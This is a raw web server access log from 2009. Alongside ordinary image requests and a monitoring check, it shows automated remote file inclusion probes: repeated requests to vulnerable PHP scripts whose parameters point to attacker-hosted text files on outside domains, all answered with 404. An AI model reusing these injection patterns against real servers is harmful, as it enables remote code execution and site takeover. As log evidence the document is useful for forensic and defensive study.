121.101.214.54 - - [23/Sep/2009:05:15:40 -0400] "GET /logs//skins/advanced/advanced1.php?pluginpath[0]=http://www.connectapac.net//id1.txt?? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
121.101.214.54 - - [23/Sep/2009:05:15:40 -0400] "GET //skins/advanced/advanced1.php?pluginpath[0]=http://www.connectapac.net//id1.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
121.101.214.54 - - [23/Sep/2009:05:15:51 -0400] "GET /logs//skins/advanced/advanced1.php?pluginpath[0]=http://www.connectapac.net//id1.txt?? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
121.101.214.54 - - [23/Sep/2009:05:15:51 -0400] "GET //skins/advanced/advanced1.php?pluginpath[0]=http://www.connectapac.net//id1.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
121.101.214.54 - - [23/Sep/2009:05:15:51 -0400] "GET /logs/error_log.Q109060100//skins/advanced/advanced1.php?pluginpath[0]=http://www.connectapac.net//id1.txt?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
209.59.12.99 - - [23/Sep/2009:05:16:41 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
121.101.214.54 - - [23/Sep/2009:05:16:42 -0400] "GET /logs//skins/advanced/advanced1.php?pluginpath[0]=http://www.connectapac.net//id1.txt?? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
121.101.214.54 - - [23/Sep/2009:05:16:42 -0400] "GET //skins/advanced/advanced1.php?pluginpath[0]=http://www.connectapac.net//id1.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
121.101.214.54 - - [23/Sep/2009:05:16:49 -0400] "GET //skins/advanced/advanced1.php?pluginpath[0]=http://www.connectapac.net//id1.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
121.101.214.54 - - [23/Sep/2009:05:16:49 -0400] "GET /logs//skins/advanced/advanced1.php?pluginpath[0]=http://www.connectapac.net//id1.txt?? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
121.101.214.54 - - [23/Sep/2009:05:16:49 -0400] "GET /logs/error_log.Q109060100%20%20//skins/advanced/advanced1.php?pluginpath[0]=http://www.connectapac.net//id1.txt?? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
61.100.5.136 - - [23/Sep/2009:05:16:50 -0400] "GET /logs/error_log.Q109081800//config/dbutil.bck.php?confdir=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
61.100.5.136 - - [23/Sep/2009:05:18:04 -0400] "GET /logs/access_log.Q109081800//config/dbutil.bck.php?confdir=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
222.253.82.6 - - [23/Sep/2009:05:18:11 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705)"
222.253.82.6 - - [23/Sep/2009:05:18:11 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705)"
222.253.82.6 - - [23/Sep/2009:05:18:15 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705)"
222.253.82.6 - - [23/Sep/2009:05:18:15 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705)"
61.100.5.136 - - [23/Sep/2009:05:18:39 -0400] "GET /logs//ashnews.php?pathtoashnews=http://dogstudio.net/ampoll/idxx.txt?? HTTP/1.1" 404 215 "-" "Mozilla/5.0"
61.100.5.136 - - [23/Sep/2009:05:18:39 -0400] "GET /logs/access_log.Q109080900//ashnews.php?pathtoashnews=http://dogstudio.net/ampoll/idxx.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
